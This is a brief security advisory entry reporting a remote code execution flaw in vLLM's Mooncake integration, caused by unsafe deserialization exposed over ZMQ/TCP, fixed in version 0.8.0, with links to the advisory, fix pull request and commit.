vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. When vLLM is configured to use Mooncake, unsafe deserialization exposed directly over ZMQ/TCP on all network interfaces will allow attackers to execute remote code on distributed hosts. This is a remote code execution vulnerability impacting any deployments using Mooncake to distribute KV across distributed hosts. This vulnerability is fixed in 0.8.0.
https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7
https://github.com/vllm-project/vllm/pull/14228
https://github.com/vllm-project/vllm/commit/288ca110f68d23909728627d3100e5a8db820aa2